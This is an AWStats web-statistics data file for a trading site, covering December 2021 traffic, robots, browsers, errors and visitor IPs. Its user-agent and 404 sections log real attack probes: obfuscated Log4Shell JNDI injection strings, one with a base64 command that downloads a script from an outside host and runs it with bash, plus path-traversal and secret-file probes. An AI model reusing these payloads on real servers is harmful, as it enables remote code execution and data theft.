AWSTATS DATA FILE 7.8 (build 20200416)
# If you remove this file, all statistics for date 202112 will be lost/reset.
# Last config file used to build this data file was /home/fcwhadm/tmp/awstats/ssl/awstats.fxoption.io.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2011                
POS_TIME 2693                
POS_VISITOR 20530               
POS_DAY 38120               
POS_DOMAIN 3610                
POS_LOGIN 4166                
POS_ROBOT 4321                
POS_WORMS 5103                
POS_EMAILSENDER 5234                
POS_EMAILRECEIVER 5377                
POS_SESSION 38863               
POS_SIDER 39074               
POS_FILETYPES 5512                
POS_DOWNLOADS 5833                
POS_OS 5881                
POS_BROWSER 6279                
POS_SCREENSIZE 7914                
POS_UNKNOWNREFERER 7988                
POS_UNKNOWNREFERERBROWSER 10129               
POS_ORIGIN 11888               
POS_SEREFERRALS 12034               
POS_PAGEREFS 12197               
POS_SEARCHWORDS 12953               
POS_KEYWORDS 13105               
POS_MISC 2356                
POS_ERRORS 13164               
POS_CLUSTER 4022                
POS_SIDER_404 13370               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20220101000301 145 22762 4668671119214
FirstTime 20211206030200
LastTime 20211231231803
LastUpdate 20220101054152 145 0 144 0 0
TotalVisits 766                 
TotalUnique 335                 
MonthHostsKnown 0                   
MonthHostsUnknown 489                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
PDFSupport 0 0 0
DirectorSupport 0 0 0
TotalMisc 0 0 0
WindowsMediaPlayerSupport 0 0 0
QuickTimeSupport 0 0 0
RealPlayerSupport 0 0 0
JavascriptDisabled 0 0 0
AddToFavourites 0 44 0
JavaEnabled 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 22 34 2001274 87 94 5580729
1 17 17 649366 67 70 5649230
2 50 62 2308262 83 108 6459338
3 58 71 2136534 140 157 7109926
4 19 44 2836449 79 80 5923145
5 94 220 11180315 106 136 6223932
6 77 101 4207446 104 114 7990767
7 61 118 6332717 89 97 5897001
8 377 529 21019131 151 156 7734664
9 343 398 12519215 152 203 9291653
10 105 220 11789440 120 133 7057293
11 110 119 4030229 95 98 6750193
12 82 201 11399857 121 162 7441969
13 119 259 14843304 92 98 7625371
14 297 406 16500913 145 175 13746916
15 62 99 4332293 87 92 7889048
16 43 44 1081120 108 128 6908007
17 47 93 5578575 112 143 8079652
18 27 48 1348496 95 110 6912673
19 85 171 9474912 96 114 6171254
20 70 179 8817716 100 110 7757628
21 95 115 3363720 96 102 6269004
22 18 46 1747092 93 103 6301901
23 38 223 7188124 239 377 6177251
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 23
us 2022 3362 146553697
se 76 76 3543300
cn 42 75 4138787
mn 34 122 5932585
in 32 41 849413
gb 22 24 823587
ru 20 26 1280309
fr 13 16 718306
nl 7 8 269933
eu 7 16 1140223
gr 7 7 286586
ao 6 6 238104
de 5 5 145880
jp 5 5 146095
kr 3 3 6126
dk 3 3 96716
ca 3 13 163841
au 3 3 141943
es 2 2 94674
tr 1 1 38104
ma 1 1 38137
sc 1 1 38112
my 1 1 2042
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 16
curl 794 1769310 20211231230501 0
no_user_agent 108 3822796 20211231191345 0
Googlebot/ 86 2438158 20211228000933 0
bingbot/ 57 2022852 20211230074645 0
Lightspeed 31 2216882 20211224145435 0
bingpreview 21 782823 20211216091410 0
facebookexternalhit/ 20 1311345 20211227094207 0
Go\-http\-client/ 13 210609 20211230021125 0
bot[\s_+:,\.\;\/\\-] 8 376985 20211230104143 0
(firefox/)([0-9]\.|[0-1][0]\.) 8 356418 20211231201956 0
Dalvik/ 3 132152 20211222162010 0
ng/1\. 3 95549 20211230072145 0
Googlebot\-Image/ 2 320572 20211217014850 0
libwww\-perl 2 4040 20211206123900 0
survey 1 2042 20211206090927 0
Who\.is[\x20]Bot 1 46714 20211215163555 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 13
html 693 25356915 0 0
jpg 45 6460260 0 0
map 5 1093040 0 0
woff 9 547166 0 0
css 380 20076599 0 0
Unknown 1137 27587585 0 0
com 36 905646 0 0
svg 2 3532 0 0
png 458 41259380 0 0
gif 5 18580 0 0
woff2 169 10351016 0 0
js 611 32275373 0 0
php 267 751408 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 0
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 23
macosx13 1 1
Unknown 153 151
androidpie 5 2
win10 2956 1783
win8.1 11 11
macosx7 3 3
linux 184 117
androidlollipop 1 1
androidkitkat 3 3
ios_iphone 79 43
winxp 28 8
symbian 2 2
linuxubuntu 29 21
win8 3 3
macosx11 104 84
macosx9 26 5
macosx14 81 32
android10 4 1
androidnougat 5 2
win7 61 33
macosx15 5 0
macosx 66 6
androidoreo 7 4
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 77
chrome60.0.3112.113 98 98
Unknown 65 63
chrome43.0.2357.124 11 11
safari8.0 1 1
chrome88.0.4324.190 5 5
android 3 3
firefox92.0 1 1
chrome79.0.3945.130 1 1
mozilla 41 41
firefox40.1 4 4
chrome86.0.4 5 4
firefox52.0 91 71
chrome78.0.3904.108 80 80
chrome70.0.3538.80 2 1
chrome89.0.4472.114 3 1
chrome81.0.4044.138 15 15
chrome44.0.2403.157 1 1
chrome78.0.3890.0 1 1
chrome45.0.2454.101 7 7
chrome63.0.3239.132 4 1
firefox65.0 4 2
safari5.1 6 0
chrome60.0.3112.90 3 3
chrome86.0.4472.114 2 1
firefox46.0 1 1
chrome96.0.4664.45 73 28
cloudflare 6 6
chrome50.0.3021.71 1 1
chrome34.0.1847.137 10 10
chrome41.0.2228.0 3 3
chrome76.0.3809.111 1 1
chrome83.0.4103.61 159 11
msie9.0 11 0
chrome35.0.1916.47 26 5
chrome91.0.4472.114 7 4
firefox40.0 3 3
chrome88.0.4472.114 2 0
opera11.50 2 0
chrome47.0.2526.106 1 1
chrome96.0.4664.110 2565 1548
chrome77.0.3865.90 1 1
firefox84.0 5 5
chrome87.0.4280.88 69 9
chrome76.0.3809.71 14 4
chrome95.0.4638.69 32 11
chrome83.0.4103.97 46 46
safari2.0.1 1 1
chrome54.0 10 6
edge12 1 1
chrome41.0.2224.3 25 5
chrome49.0.2623.112 3 3
chrome74.0.3729.131 4 4
chrome87.0.4472.114 2 0
chrome68.0.3440.106 1 1
chrome96.0.4664.93 4 4
msie11.0 7 7
chrome90.0.4472.114 3 2
chrome75.0.3770.142 1 1
firefox58.0 29 21
chrome52.0.3025.59 1 1
chrome91.0.4472.106 3 3
chrome14.0.835.163 6 0
firefox60.8 2 2
firefox80.0 5 0
chrome94.0.4606.61 38 17
chrome81.0.4044.129 14 14
firefox47.0 12 12
chrome78.0.3904.87 25 5
firefox73.0 2 2
netscape5.0 37 37
safari 78 42
chrome62.0.3202.84 1 1
firefox 5 5
firefox60.2.1 1 1
firefox79.0 2 2
chrome92.0.4515.107 1 1
nokia 1 1
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 23
l9tcpid/v1.1.0 20211224235625
Mozilla/5.0_(compatible;_InternetMeasurement/1.0;__https://internet-measurement.com/) 20211221135611
${jndi:ldap://5.101.118.127:1389/Exploit} 20211218194454
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODQuMTY4LjEyMS4xODE6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4NC4xNjguMTIxLjE4MTo0NDMpfGJhc2g=} 20211229212736
Expanse_indexes_the_network_perimeters_of_our_customers._If_you_have_any_questions_or_concerns,_please_reach_out_to:_scaninfo@expanseinc.com 20211231193614
Cloudflare-SSLDetector 20211227115200
Mozilla/5.0 20211209023401
https://gdnplus.com:Gather_Analyze_Provide. 20211229074557
Python/3.8_aiohttp/3.8.1 20211225215918
${jndi:${lower:l}${lower:d}a${lower:p}://wcaccess.com.policyholder.log4j.bin${upper:a}ryedge.io:80/callback} 20211230231228
NetSystemsResearch_studies_the_availability_of_various_services_across_the_internet._Our_website_is_netsystemsresearch.com 20211231183425
${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback} 20211213044817
/${jndi:ldap://45.83.193.150:1389/Exploit} 20211214013614
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers&#39;_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20211231061755
${${::-j}ndi:dns://45.83.64.1/securityscan-b3tt6qewmjq3bbi2} 20211217173844
${jndi:ldap://142.93.172.227:1389/Exploit} 20211223001022
Mozilla/5.0_zgrab/0.x 20211231174027
Mozilla/5.0_(platform;_rv:geckoversion)_Gecko/geckotrail_Firefox/firefox 20211223001022
python-requests/2.26.0 20211230185422
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20211231191346
l9explore/1.3.0 20211224235630
${jndi:ldap://121.140.99.236:1389/Exploit} 20211226002449
${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent} 20211211182714
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 17
${jndi:ldap://142.93.172.227:1389/Exploit} 20211223001022
${${::-j}ndi:dns://45.83.64.1/securityscan-b3tt6qewmjq3bbi2} 20211217173844
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers&#39;_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20211231061755
/${jndi:ldap://45.83.193.150:1389/Exploit} 20211214013614
l9tcpid/v1.1.0 20211224235625
${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback} 20211213044817
NetSystemsResearch_studies_the_availability_of_various_services_across_the_internet._Our_website_is_netsystemsresearch.com 20211231183425
${jndi:${lower:l}${lower:d}a${lower:p}://wcaccess.com.policyholder.log4j.bin${upper:a}ryedge.io:80/callback} 20211230231228
Python/3.8_aiohttp/3.8.1 20211225215918
${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent} 20211211182714
${jndi:ldap://121.140.99.236:1389/Exploit} 20211226002449
https://gdnplus.com:Gather_Analyze_Provide. 20211229074557
l9explore/1.3.0 20211224235630
Expanse_indexes_the_network_perimeters_of_our_customers._If_you_have_any_questions_or_concerns,_please_reach_out_to:_scaninfo@expanseinc.com 20211231193614
python-requests/2.26.0 20211230185422
${jndi:ldap://5.101.118.127:1389/Exploit} 20211218194454
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xODQuMTY4LjEyMS4xODE6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE4NC4xNjguMTIxLjE4MTo0NDMpfGJhc2g=} 20211229212736
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 793 1007
From1 12 12
From2 2 2
From3 18 188
From4 1491 2608
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 1
www_google_com 2 2
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 13
https://184.168.121.181/assets/templates/basic/frontend/css/line-awesome.min.css 6 6
https://184.168.121.181 6 108
https://cpanel.fxoption.io/cPanel_magic_revision_1616517441/unprotected/cpanel/fonts/open_sans/open_sans.min.css 3 3
https://l.facebook.com 1 1
https://184.168.121.181:443 1 1
https://www1.domain.com 1 1
https://184.168.121.181/1 0 16
https://mail.fxoption.io/1 0 2
https://184.168.121.181 0 10
https://cpanel.fxoption.io/cPanel_magic_revision_1631136632/unprotected/cpanel/style_v2_optimized.css 0 7
https://mail.fxoption.io 0 10
https://cpanel.fxoption.io 0 3
https://mail.fxoption.io 0 20
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 10
405 131 26346053
403 8 0
400 2 47065
302 143 54990
301 66 15894
500 395 129392643
401 83 80403
419 2 2388
404 954 999830
412 1 0
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 259
/account 1 -
/menu/privacy/linkedin.com 2 -
/web/database/manager 1 -
/manage 1 -
/${jndi:ldap://121.140.99.236:1389/Exploit} 1 -
/PMUser 1 -
/images/logo_pan_158.gif 1 -
/home/login/index.html 3 -
/flu/403.html 2 -
/GponForm/diag_Form 1 -
/blog/phpmyadmin 1 -
/bitrix/admin 1 -
/static 1 -
/tiki-login.php 1 -
/remote/fgt_lang 1 -
/zipkin 1 -
/_profiler 1 -
/examples 1 -
/nagiosna 1 -
/opennms/login.jsp 1 -
/sitecore/admin/login.aspx 1 -
/cron/crypto/pricehttps://fxoption.io/cron/crypto/price 1 -
/debug/default/view 1 -
/webfig 1 https://184.168.121.181/webfig/
/solr/ 1 -
/static/home/css/financing.css 2 -
/login.zul 1 -
/fpui/jsp/login.jsp 1 -
/ews 1 -
/CTCWebService/Config1 1 -
/hybris/hmc/hybris 1 -
/sitemap_index.xml 9 -
/m3/cssx/index-1.css 2 -
/+CSCOE+/logon.html 1 -
/mysql.php 1 -
/doenterpagevariables.action 1 -
/menu/overview/twitter.com 2 -
/owa/auth.owa 2 -
/rpc 1 -
/zdm/login_xdm_uc.jsp 1 -
/_ignition/execute-solution 16 -
/api/v1 2 -
/VirtualEms/Login.aspx 1 -
/html/setup.html 1 -
/plc/webvisu.htm 1 -
/HNAP1 3 -
/sitemaps.xml 10 -
/user.php 1 -
/static/lib/Hui-iconfont/1.0.8/iconfont.css 2 -
/calendar/admin/cal_login.php 1 -
/status.htm 1 -
/console 12 https://184.168.121.181:443/console/
/info.php 1 -
/glpi 1 -
/Public/Wap/jinrong/Mobile/weiyun/css/index.css 3 -
/phppgadmin 1 -
/assets/images/seo/ 1 -
/AirWatch/Login 1 -
/tmui/login.jsp 1 -
/portal/webclient/index.html 1 -
/autodiscover/autodiscover.json 1 -
/webconsole/webpages/login.jsp 1 -
/forum/phpmyadmin 1 -
/stream/live.php 2 -
/carbon/admin/login.jsp 1 -
/install/kaseyalatestversion.xml 1 -
/www/start.html 1 -
/menu/terms/instagram.com 2 -
/cvsroot/config 1 -
/linkedin.com 2 -
/login.jsp 1 -
/assets/version2/js/slide.js 3 -
/cgi-bin/../../../../bin/sh 16 -
/Public/Qts/Home/css/pchome.css 3 -
/mifs/login.jsp 1 -
/global-protect/portal/css/login.css 1 -
/static/index/js/lk/user.js 2 -
/Public/mobile/js/config.js 2 -
/system_api.php 2 -
/fuel 3 -
/mobile/index.php 1 -
/js/app.js 1 -
/owa 2 https://184.168.121.181/owa/
/seeyon/index.jsp 1 -
/auth/login 1 -
/api/blog/5e09fe7d-84f5-4630-90c6-c0a838627227 1 -
/webclient/Login.xhtml 1 -
/$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D 1 -
/ 2 -
/general/login/index.php 1 -
/text4041639710977 1 -
/index.jsp 1 -
/assets/js/platform/popper.min.js 3 -
/.git/config 7 -
/subscribe 2 -
/pagespeed_admin 1 -
/logon/LogonPoint/custom.html 1 -
/owa/auth/x.js 22 -
/aaa9 1 -
/menu/privacy/twitter.com 2 -
/Public/admin/hplus/css/bootstrap.min.css 3 -
/${jndi:ldap://142.93.172.227:1389/Exploit} 1 -
/sql.php 1 -
/atom.xml 8 -
/Sitefinity/Authenticate/SWT 1 -
/menu/overview/instagram.com 2 -
/.env 177 -
/search/admin/admin.php 1 -
/static/home/js/rooms.js 3 -
/owa/auth/logon.aspx 48 -
/wp-login.php 4 -
/mifs/. 15 https://184.168.121.181:443
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 46 -
/login 2 -
/$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D 1 ${jndi:dns://45.83.64.1/securityscan-https443}
/_adminer.php 1 -
/nmaplowercheck1640058979 1 -
/userportal/webpages/myaccount/login.jsp 1 -
/pcweb/static/css/main.e5ee9b2df05fc2d310734b11cc8c911e.css 3 -
/login_up.php 1 -
/sessions/new 1 -
/CFIDE/componentutils/login.cfm 1 -
/Orion/Login.aspx 1 -
/CTCWebService/CTCWebServiceBean 2 -
/vsapres/web20/core/login.aspx 1 -
/assets/version2/2_files/index.css 2 -
/weblogin.htm 1 -
/solr/admin/info/properties 1 -
/config.json 1 -
/cgi-bin/config.exp 1 -
/tiki-login_scr.php 1 -
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 32 -
/odd/app/download/list 1 https://api.cbq66.com
/resources/main/index.js 3 -
/hm/login.action 1 -
/mifs/c/d/android.html 1 -
/Try%20Quick%20Demo 3 -
/twitter.com 2 -
/mifs/user/login.jsp 1 -
/start.html 1 -
/evox/about 4 -
/remote 1 -
/admin/public/index.html 1 -
/restapi.php 1 -
/TCh] 1 -
/assets/admin/js/izitoast.min.js 1 -
///remote/fgt_lang 2 -
/public 1 -
/nagiosxi 1 -
/dana-na/nc/nc_gina_ver.txt 1 -
/RASHTML5Gateway 1 -
/phpmyadmin 1 -
/nagioslogserver 1 -
/static/home/mobile/js/index/index.css 2 -
/dfshealth.html 1 -
/stalker_portal/c/version.js 2 -
/virtualems/Login.aspx 1 -
/users/sign_in 4 -
/php/phpmyadmin 1 -
/fuel/modules/fuel/assets/css/fuel.css 1 -
/resource/home/css/person.css 2 -
/static/home/css/creative.css 3 -
/.hg/hgrc 1 -
/authorization.do 1 -
/status.php 1 -
/Autodiscover/Autodiscover.xml 17 -
//a2billing/customer/templates/default/footer.tpl 2 -
/streaming/clients_live.php 2 -
/nmaplowercheck1640365720 1 -
/c/version.js 2 -
/currentsetting.htm 1 -
/sitemap.xml.gz 15 -
/aab9 1 -
/tpl/Public/js/func.js 2 -
/etc/passwd 1 -
/xampp/phpmyadmin 1 -
/static/home/mobile/css/new_page.css 2 -
/server.login.xsi 1 -
/login.aspx 1 -
/sslmgr 1 -
/login/Login.jsp 1 -
/sitemap.xml 24 -
///libs/js/iframe.js 1 -
/radiusmanager/user.php 1 -
/menu/privacy/instagram.com 2 -
/ReportServer 4 -
/sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html 1 -
/${jndi:ldap://45.83.193.150:1389/Exploit} 1 -
/home.html 1 -
/editor.php 1 -
/.git/HEAD 1 -
/cgi-bin/webcm 1 -
/dist/static/tradeview/charting_library/charting_library.min.js 3 -
/sitemap.txt 8 -
/actuator/health 21 -
/Public/Wap/jinrong/Mobile/Public/css/ucenter.css 3 -
/assets/admin/css/vendor/bootstrap.min.css.map 1 -
/global-protect/login.esp 1 -
/owa/ 2 -
/robots.txt 74 -
/system/login 1 -
/assets/admin/js/vendor/bootstrap-toggle.min.js.map 1 -
/menu/terms/twitter.com 3 -
/static/index/js/lk/order.js 2 -
/menu/terms/linkedin.com 2 -
/sphider/admin/admin.php 1 -
/menu/overview/linkedin.com 3 -
/.DS_Store 3 -
/secure/Dashboard.jspa 1 -
/digit/app/download/list 1 https://api.38666.com
/webmin 1 -
/ui/login 1 -
/ecp 1 -
/jenkins/login 3 -
/apache-default/phpmyadmin 1 -
/manager/html 5 -
/.svn/entries 1 -
/l.php 3 -
/Public/admin/hplus/css/login.min.css 2 -
/pandora_console/mobile 1 -
/assets/templates/basic/frontend/css/ 2 -
/logon/LogonPoint/index.html 1 -
/calendarix/admin/cal_login.php 1 -
/text4041640952805 1 -
/solr 3 https://184.168.121.181/solr/#/
/${jndi:ldap://5.101.118.127:1389/Exploit} 1 -
/.well-known/security.txt 9 -
/instagram.com 2 -
/.bzr/branch/branch.conf 1 -
/bag2 4 -
/rdweb 1 -
/m_login.htm 1 -
/typo3/phpmyadmin 1 -
/auth/admin/master/console 1 -
/script 3 -
/webalizer 1 -
/remote/login 3 -
/wp-content/plugins/adminer/adminer.php 1 -
/assets/admin/css/app.css.map 1 -
/monitorix-cgi/monitorix.cgi 1 -
/cgi-bin/../../../../../../../../../etc/hosts 3 -
/Telerik.Web.UI.WebResource.axd 1 -
/cluster/cluster 1 -
/myjsp.jsp 1 -
/horizon/auth/login 1 -
/nagiosfusion 1 -
/1 13 -
/wls-wsat/CoordinatorPortType11 1 -
/resources/js/way.min.js 3 -
/login.action 1 -
/icons/sphere1.png 2 -
/tpl/Public/js/layer_mobile2/layer.js 3 -
/api/upload 3 -
/static_new6/js/manifest.3ad1d5771e9b13dbdad2.js 2 -
/ui/jobs 1 -
/web/phpmyadmin 1 -
/hmc/hybris 1 -
/console/ 4 -
/_async/AsyncResponseService 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 25 first Hits must be first (order not required for others)
BEGIN_VISITOR 489
162.158.178.195 212 212 2173237 20211218143039
162.158.179.72 175 175 4312614 20211218131011
162.158.179.244 138 138 2769887 20211218161528
162.158.179.50 122 122 3669625 20211220111958
162.158.179.205 121 121 3775892 20211220062131
172.68.254.103 106 106 2492838 20211218143209
162.158.179.210 83 83 1935423 20211220110230
195.54.160.149 76 76 3543300 20211229212736
162.158.178.228 73 73 2285753 20211220105031
35.195.37.204 73 93 2504868 20211225215918
172.68.254.45 58 81 3166365 20211220110807
162.158.179.127 53 53 1284732 20211220064332
172.68.253.29 48 48 1338322 20211219235741
162.158.178.89 44 44 1040474 20211220105118
162.158.179.142 43 43 1232159 20211220064142
162.158.179.17 34 34 359155 20211227124239
202.9.40.28 31 119 5835869 20211215203150
162.158.179.42 27 31 1027819 20211230195556
162.158.178.121 20 20 1935040 20211230192149
162.158.179.240 19 29 299270 20211230192149
172.69.252.137 19 23 644695 20211227100430
162.158.179.250 19 34 2440493 20211230192149
162.158.179.108 16 16 270114 20211218134405
45.155.205.233 15 15 30630 20211210093831
172.69.45.141 14 18 453591 20211224051801
192.241.214.64 1 1 47337 20211223133848
60.13.138.60 0 1 160409 
172.69.252.139 2 13 1182345 20211227100244
112.74.52.90 1 1 46714 20211214013614
112.66.109.245 0 1 2621 
23.90.160.122 2 2 49379 20211231221534
40.77.167.13 0 1 966 
34.86.35.15 1 1 38092 20211228104302
172.68.253.67 0 1 15823 
138.197.156.110 0 14 157388 
209.141.33.65 2 8 303361 20211231182350
162.158.179.88 0 1 21122 
49.232.147.71 11 11 476763 20211217034817
172.68.254.125 0 20 19320 
162.158.179.82 0 18 332748 
198.199.105.235 1 1 47337 20211220133533
172.68.254.15 0 2 89432 
172.68.102.187 1 1 47337 20211226192351
209.141.35.128 0 4 97698 
20.120.107.209 1 1 2042 20211211075606
192.241.213.13 1 1 2042 20211207164327
162.142.125.44 1 1 47337 20211231163835
192.241.207.18 1 1 47337 20211227173048
51.254.49.107 2 2 85509 20211227120045
210.39.74.4 0 1 2621 
162.158.178.146 4 5 152148 20211230195632
183.136.225.42 1 2 58579 20211219204849
162.142.125.42 1 1 47337 20211221214803
172.68.254.175 0 10 37170 
172.105.35.108 1 1 0 20211219135751
162.158.178.67 0 28 1931850 
205.185.117.203 2 7 304973 20211231182358
172.70.98.117 0 1 5756 
157.55.39.113 0 2 4683 
192.241.214.143 1 1 47337 20211222133717
137.226.113.44 4 4 143838 20211229121459
111.224.248.102 0 1 160409 
34.222.108.189 1 1 2042 20211208202231
172.68.102.175 0 1 128803 
172.68.118.43 1 1 47065 20211228123729
45.143.146.244 1 1 2042 20211212074329
139.180.157.168 6 6 102219 20211230185422
3.139.64.176 1 1 47337 20211219055730
45.90.60.150 1 1 2042 20211206171155
188.114.110.223 0 1 234268 
172.68.133.67 1 1 47065 20211221152049
172.68.254.131 0 19 109364 
108.162.215.185 0 1 153357 
205.185.122.184 1 6 135141 20211228054640
205.169.39.25 4 14 121696 20211206030304
192.99.18.122 1 1 2042 20211206150655
192.53.170.243 1 1 47337 20211225025038
209.141.51.49 0 4 170504 
162.158.178.204 0 1 53648 
66.240.236.109 2 2 49379 20211231071457
162.158.178.17 0 19 14462496 
172.70.98.5 0 1 4332 
34.86.35.8 1 1 47201 20211221024518
176.113.42.67 1 1 12260 20211206163942
185.180.143.8 5 5 190767 20211230145454
167.94.138.59 1 1 46714 20211216061502
124.89.119.5 0 1 2621 
103.28.70.46 1 1 2042 20211212105808
146.196.54.59 2 2 94674 20211225011222
34.78.46.106 1 1 47201 20211225182456
172.68.254.159 0 19 761991 
172.70.98.39 0 1 3717 
162.158.179.115 0 1 35542 
162.158.179.219 0 11 971036 
3.143.25.141 1 1 47337 20211219060014
162.158.106.65 2 2 94130 20211225030408
162.158.179.176 0 17 1423367 
162.158.178.61 0 10 1025340 
35.87.154.146 1 1 2042 20211208202259
45.83.64.172 1 1 47337 20211222061448
161.35.69.51 1 1 46714 20211216145316
162.158.179.172 0 24 901097 
172.68.253.27 0 19 844290 
108.162.215.109 0 1 8845 
192.241.211.245 1 1 2042 20211209165121
172.68.102.137 0 1 11242 
162.158.179.123 10 27 479777 20211230195327
162.158.178.236 0 1 105185 
172.68.254.19 0 13 1148451 
162.158.179.34 0 14 2237746 
167.94.138.116 3 3 51421 20211227143606
162.158.178.43 0 10 164850 
192.241.211.102 1 1 47337 20211228173247
120.0.52.58 0 1 2621 
141.101.68.169 0 1 75705 
167.94.138.41 1 1 47337 20211229225634
211.65.112.110 0 2 163030 
58.244.38.242 0 1 160409 
129.211.122.50 3 3 104848 20211218050516
108.162.229.15 2 2 94130 20211228072206
172.68.253.49 2 2 193504 20211230195327
162.158.106.225 5 5 235325 20211229024939
209.141.51.222 0 5 130085 
104.131.92.4 1 1 47337 20211218115707
80.82.77.192 5 5 145472 20211225052907
172.68.254.37 11 11 1064272 20211230195400
185.180.143.138 1 1 46714 20211215005148
162.221.192.26 10 10 335616 20211225194213
34.86.35.24 1 1 48425 20211228101741
162.158.106.177 4 4 188260 20211227025929
23.90.160.130 1 1 47337 20211221001449
162.158.178.185 0 10 31370 
108.162.215.139 0 1 3733 
162.158.179.254 0 20 1738540 
71.6.232.7 4 4 143430 20211227211414
172.69.252.151 1 9 1044742 20211227100201
221.2.163.231 2 2 4084 20211209023401
161.35.188.242 3 3 141388 20211224235630
192.241.211.230 1 1 47337 20211218125313
192.241.201.179 1 1 2042 20211211165730
221.11.20.166 0 1 160409 
192.241.205.88 1 1 2042 20211206164050
172.68.253.51 0 1 51492 
185.220.100.250 1 1 46714 20211215202442
192.241.209.167 1 1 47337 20211231174027
162.158.94.149 0 1 128803 
162.158.107.10 4 4 188260 20211230023004
104.237.153.163 7 44 2558045 20211230232037
185.220.101.169 1 1 2042 20211210083322
89.104.100.165 1 4 421718 20211227175848
188.114.111.202 0 1 128803 
45.83.64.160 1 1 47337 20211217173844
128.14.209.170 3 3 141388 20211228194054
167.248.133.116 1 1 46714 20211213190309
193.169.254.174 3 3 142011 20211224163957
164.52.53.163 2 2 16384 20211223001022
162.158.178.7 0 9 14310 
128.1.248.26 5 5 234816 20211231182022
34.86.35.30 1 1 46578 20211213235338
34.86.35.26 2 2 85305 20211231193614
172.70.98.93 1 1 96752 20211218202927
172.68.102.147 0 1 234268 
103.28.70.140 2 2 4084 20211210013120
88.0.214.160 2 2 94674 20211224141812
172.68.254.41 0 13 1461712 
108.162.229.203 1 1 47065 20211227104501
138.68.239.198 0 10 112420 
162.158.179.242 0 8 683552 
211.66.15.108 0 2 163030 
172.70.98.3 1 1 84772 20211218202927
62.4.14.198 2 3 192740 20211231045818
